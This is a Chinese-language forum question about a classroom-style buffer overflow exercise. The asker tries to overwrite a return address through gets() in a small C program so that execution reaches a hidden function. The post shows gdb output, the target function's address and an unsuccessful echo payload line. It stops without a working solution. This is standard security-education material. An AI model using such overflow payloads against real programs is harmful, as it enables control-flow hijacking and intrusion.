我一直在尝试通过利用输入,对下面的程序isThisGood.c实施缓冲区溢出攻击,请参阅gets()。无需修改程序。通过设计恶意输入导致成功利用。成功的利用会调用oopsIGotToTheBadFunction函数,尽管未在isThisGood.c中显式调用此函数!我一直在阅读它们,但似乎所有示例似乎都使用scanf或strcpy()
这是我尝试过的:
cc -ggdb isThisGood.c
gdb a.out
break goodFunctionUserInput
Breakpoint 1 at 0x4007ec: file isThisGood.c, line 13.
(gdb) run
Breakpoint 1, goodFunctionUserInput () at isThisGood.c:13
13 gets(buf);
(gdb) backtrace
#0 goodFunctionUserInput () at isThisGood.c:13
#1 0x0000000000400824 in main () at isThisGood.c:19
print /x *buf@40
$1 = {0x0, 0x0, 0x0, 0x0, 0x60, 0x57, 0x60, 0x0, 0x8, 0x0, 0x0, 0x0,
0x50, 0xeb, 0xff, 0xff, 0xff, 0x7f, 0x0, 0x0, 0x24, 0x8, 0x40, 0x0, 0x0,
0x0, 0x0, 0x0, 0x98, 0x3c, 0xd2, 0x70, 0xe8, 0x16, 0xd3, 0x16, 0x0, 0x0,
0x0, 0x0}
(gdb) print oopsIGotToTheBadFunction
$2 = {int (void)} 0x4007b0 <oopsIGotToTheBadFunction>
echo -e "farmacodependientes\x0\xb0\x07\x40" | ./a.out
warning: this program uses gets(), which is unsafe.
我不确定从这里去哪里,我们将为您提供帮助。
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf ("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput (void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput ();
printf("Overflow failed\n");
return(1);
}